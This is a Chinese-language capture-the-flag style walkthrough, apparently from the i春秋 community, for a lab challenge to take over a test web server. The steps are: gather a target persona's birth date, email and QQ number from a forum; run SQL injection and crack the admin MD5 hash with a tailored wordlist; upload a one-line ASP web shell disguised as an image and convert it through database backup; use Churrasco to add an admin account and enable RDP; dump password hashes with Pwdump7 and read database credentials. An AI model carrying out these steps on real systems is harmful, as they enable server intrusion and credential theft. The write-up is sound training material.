作者:独狼1927
来源:02-在线挑战详细攻略-《网站综合渗透实验》
系列文章:
01-在线挑战详细攻略-《我很简单,请不要欺负我》
03-在线挑战详细攻略-《又见DZ,我能拿你怎么办》
04-在线挑战详细攻略-《2015中国网络安全大赛:Reinstall真题》
05-在线挑战详细攻略-《2015中国网络安全大赛:框架漏洞真题》
<h1>Step 0</h1>
实验环境
操作机:Windows XP [172.16.11.2]
目标网址:www.test.com [172.16.12.2]
ps:www.test.com www.test.ichunqiu都是可以的
实验工具:
中国菜刀 ipscan MD5Crack2
Domain3.6 NTscan字典 saminside
SuperScan30 X-Scan-v3.3
亦思想社会工程学字典生成器
本实验要求获取www.test.com网站的服务器权限。
ps:图片可单击放大观看。
<h1>Step 1</h1>
从题目要求可以看出,这个实验明显是要突出社会工程学,所以搜集信息就是必须的了,尽可能的搜集!
打开浏览器,进入网站首页,眼尖的童鞋会发现菜单最右边写着 [摄影论坛],果断进入论坛转转;
进入论坛后,寻找与linhai有关的信息,发现有他发表的文章,点击斑竹名称 [linhai];
额~ 没有登录还不能查看,那就果断注册吧!点击左侧的[注册] 菜单进入注册页面,不要点上边的注册,进不去;
点击页面下方的 [我同意] 进行下一步;(不同意不行啊^_^)
把表单中带星星的都填上,最重要的是记住用户名和密码,别刚注册完就忘了~ (芸芸众生中这样的事情经常发生)
填完点击 [申请] 进行提交;注册完有了自己的账号后,你就可以看到linhai的信息了,用户名就不用说了,问题里已经给了;
注意签名栏:生于唐山大地震!中国人应该都知道唐山大地震是哪一年发生的吧~
Paste_Image.png
Linhai的出生年份已经搞定,回到秋潮视觉工作室首页,页面底部有linhai的电子邮箱,0812很有可能就是linhai的生日;还有他的QQ号:1957692;
综上所述,我们目前获得的信息包括:
用户名:Linhai
出生日期: 1976年08月12日
Email:linhai0812@21cn.com
QQ:1957692
顺带着发现了后台入口…
点击 [管理入口] 就可以进入后台登录页面;
Paste_Image.png
当然绝大多数后台是不会直接爆出来的,得用工具;
目录扫描
工具:御剑 路径:C:\Tools\目录扫描
打开御剑,在域名中输入http://www.test.com,开始扫描
在目录列表中查找后台,发现存在/admin/login.asp
回到后台登录页面,当然用户名和密码都不知道,利用我们之前获得的社工信息,加上注入,进一步获取用户名和密码。
<h1>Step 2</h1>
工具:旁注WEB综合检测程序Ver3.6修正版
路径:C:\Tools\注入工具\Domain3.6\Domain3.6.exe
打开工具,依次点击 [SQL注入] -->[批量扫描注入点] --> [添加网址] --> [批量分析注入点];
出现下面这个对话框说明已经检测完毕;
点击OK进行下一步;
注入点分析完毕后,会在下方列表中显示可注入的地址,选择其中一个地址,右键选择[检测注入];
检测完毕后,显示可以注入,并列出了数据库类型:Access数据库;
下面开始逐步 [猜解表名] -->[猜解列名]--> [猜解内容];
点击 [猜解表名] 后,在数据库列表中会显示3个表,分别是admin、news和config;
选择admin表,点击 [猜解列名],成功猜解出三个列名id、admin和password;
勾选admin和password,点击 [猜解内容],右侧列表中成功显示用户名linhai,密码d7e15730ef9708c0
下一步,打开字典生成器,生成字典;
工具:亦思想社会工程学字典生成器
路径:C:\Tools\社会辅助\亦思想社会工程学字典生成器\亦思想社会工程学字典生成器.exe
打开社工工具亦思想社会工程学字典生成器,输入之前获得的社工信息,生成字典;
点击 [生成字典] 之后,会在工具同一目录下生成mypass.txt,这个就是我们需要的字典;
打开MD5破解工具,准备破解;
工具:MD5Crack2.exe 路径: C:\Tools\破解工具\MD5\ MD5Crack2.exe
打开破解工具,输入我们获得的密码密文,选择 [使用字典];
点击 [浏览] 按钮,选择刚刚生成的社工字典mypass.txt;注意,如果找不见文件,在文件类型中选择全部文件;
点击 [开始] 按钮进行暴力破解,运气很好,秒破!
也可以直接上网进行破解,打开[http://www.somd5.com](http://www.somd5.com/),输入让你无语的MD5:d7e15730ef9708c0,因为有人提交过,也是秒破;
成功找到明文密码:linhai19760812
下一步:登录后台,上传木马,GETSHELL;
<h1>Setp3</h1>
打开后台登录页面,输入用户名linhai,密码linhai19760812,输入验证码,点击 [登陆] 按钮登录后台;
成功进入后台
点击 [设置管理] --> [系统变量设置],发现系统设置中有上传图片的地方,下一步,构造图片木马;
在桌面上新建一个文本文件,在里面写入一句话木马
<code><%Eval Request("ichunqiu")%></code>
后面随便输入一些内容,纯粹是为了增加图片体积,但要注意,几十Kb足矣,体积太大太小都不行;
然后将文件重命名为jpg格式文件;
打开后台页面,点击 [上传图片],把刚才构造的图片传上去;
然后点击 [生成代码];
代码生成后,复制图片路径![很重要]
关键步骤到了!点击左侧菜单 [数据管理]-->[备份/恢复数据库],把 [数据库路径] 修改为刚才复制的图片路径,[备份的数据库路径] 修改为后缀名为asp的文件,文件名自己取,记住就行,然后点击备份;[ 特别注意:两个路径的最前面都有斜杠 ]
备份成功!
Paste_Image.png
打开 [中国菜刀] 连接一句话木马;
工具:中国菜刀 路径:C:\Tools\webshell\中国菜刀\chopper.exe
Paste_Image.png
打开菜刀,右键空白处,选择 [添加];
在地址栏中输入刚才备份数据库的路径,填写连接密码 [密码在一句话里],点击 [添加];
添加成功后会新增一条记录;
双击这个URL,成功进入!那个test.asp就是卧底!
下一步,添加账户-->开启3389-->远程桌面连接-->获取管理员账户密码;
<h1>Step 4</h1>
进入C:\RECYCLER目录,准备上传提权工具;
Paste_Image.png
提权工具包括Churrasco.exe,3389,cmd,路径:C:\Tools\提权工具\windows
Paste_Image.png
Churrasco.exe 中文名:巴西烤肉!
Churrasco.exe是Windows2003系统下的一个本地提权漏洞,通过此工具可以以SYSTEM权限执行命令,从而可以达到添加用户的目的。
补丁名:KB956572 MS09-012
使用方法:
<code>Churrasco "net user hacker 123 /add && net localgroup administrators hacker /add"</code>
两行命令的意思分别是:
netuser hacker 123 /add -->添加一个用户名为hacker、密码为123的账户;
netlocalgroup administrators hacker /add -->将账户hacker添加到管理员组;
开始上传工具,选中这三个文件,用鼠标直接拖到中国菜刀中,即可完成上传;
Paste_Image.png
下一步,执行提权操作;右键cmd.exe,选择 [虚拟终端]
Paste_Image.png
成功进入,将目录切换到C:\RECYCLER
Paste_Image.png
用Churrasco.exe执行cmd命令,添加账户;
<code>Churrasco "net user hacker 123 /add"</code>
Paste_Image.png
账户添加成功,继续下一步,将新增的账户添加到管理员组;
<code>Churrasco "net localgroup administrators hacker /add"</code>
Paste_Image.png
添加成功,下一步,开启3389;
<code>Churrasco 3389</code>
Paste_Image.png
如果出现如上图中的命令,说明执行成功了,不成功就多执行几次命令,下一步,连接目标机;
[开始]-->[运行]-->mstsc
Paste_Image.png
如果找不见目标IP地址,请点击右上角 [场景拓扑图] 进行查看:
Paste_Image.png
输入目标IP地址:172.16.12.2,开始连接,继续输入用户名hacker和密码123,进入系统;
Paste_Image.png
Paste_Image.png
3389连接成功!下一步,获取系统管理员密码,准确的说是获取系统管理员密码的hash,上传密码获取工具 [中国菜刀];
工具很多,这里我们使用Pwdump7;
Paste_Image.png
工具:Pwdump7 路径: C:\Tools\提权工具\hash\Pwdump7;[ 注意,一定要将libeay32.dll一并上传,否则执行不了 ]
Paste_Image.png
上传成功!
Paste_Image.png
进入目标机,将CMD目录切换到RECYCLER,运行一条命令:
<code>Pwdump7 > hash.txt</code>
Paste_Image.png
运行成功后,会在同一目录下生成一个文本文件hash.txt;
Paste_Image.png
打开hash.txt,成功获取到administrator的hash:
3C8D6C158F6FB3D1FDCFC2AFB2D1BE34:594B9CD2577A5AC2BE0CA522D5EC6ACE
Paste_Image.png
暂时切换出实验环境,在你的电脑上打开浏览器输入
http://www.objectif-securite.ch/en/ophcrack.php,在页面的相应位置输入hash,然后GO
ps:如果打不开就翻墙,或者用其他类似功能的网站也可以,这样的站很多;
Paste_Image.png
最终输出结果:
Paste_Image.png
<h1>Step 5</h1>
数据库sa密码在哪找?
WEB应用与数据库之间会有一个配置文件,用来保存数据库连接信息,包括数据库驱动、数据库名、用户名、密码等信息,找到这个文件就找到了密码
文件名:conn_old.asp
路径: C:\Inetpub\wwwroot\conn_old.asp
Paste_Image.png
打开文件即可见到Password;
Paste_Image.png
<h1>Step 6</h1>
Linhai论坛登录密码在哪里?
进入C:\Inetput\wwwroot\bbs\Data
发现有ldb文件,一般情况下肯定有mdb文件,看体积应该是dtxy.asp这个文件;
Paste_Image.png
把这个文件通过菜刀下载到本地,用Domain3.6或其他数据库浏览器工具查询即可;
Paste_Image.png
把dtxy.asp修改为数据库文件dtxy.mdb;
Paste_Image.png
打开Domain3.6,点击 [数据库管理]-->[文件]-->[打开数据库],找到文件dtxy.mdb并打开;
Paste_Image.png
找到表LeadBBS_User,第三条记录就是linhai,密码hash:e10adc3949ba59abbe56e057f20f883e
Paste_Image.png
暂时撤出实验环境,用你本机的浏览器打开http://www.cmd5.com,输入密文,点击破解~
Paste_Image.png
本次实验到此结束,希望对大家有所帮助,有不足之处请多多指正!
下一讲:《又见DZ,我能拿你怎么办》
ps:部分知识点的内容转自网络;路漫漫其修远兮,感谢一路上黑友们的帮助@lonnyboy;
Dareand the world always yields.
--END--
本文来自:i春秋社区
网友评论